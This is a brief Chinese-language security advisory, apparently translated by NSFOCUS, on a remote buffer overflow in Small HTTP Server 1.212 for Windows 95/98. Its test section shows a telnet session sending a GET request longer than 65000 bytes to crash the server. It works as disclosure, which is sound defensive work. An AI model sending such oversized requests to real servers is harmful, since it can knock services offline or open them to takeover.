安全研究
安全漏洞
Small HTTP Server 远程缓冲区溢出漏洞
发布日期:2000-06-19
更新日期:2000-06-19
受影响系统:
Max Feoktistov Small HTTP server 1.212
- Microsoft Windows 98
- Microsoft Windows 95
描述:
目前的Small HTTP版本中存在一个远程缓冲区溢出漏洞。当向webserver提交一个超
长的(大于65000字节)HTTP GET请求时,将使服务器发生缓冲区溢出。攻击者可能以
远程获取webserver运行时的权限。
<* 来源:Underground Security Systems Research (labs@ussrback.com)
http://www.ussrback.com
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /AAA...AAAA
这里"AAA...AAAA"的长度要大于65000.
建议:
暂无
浏览次数:6453
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |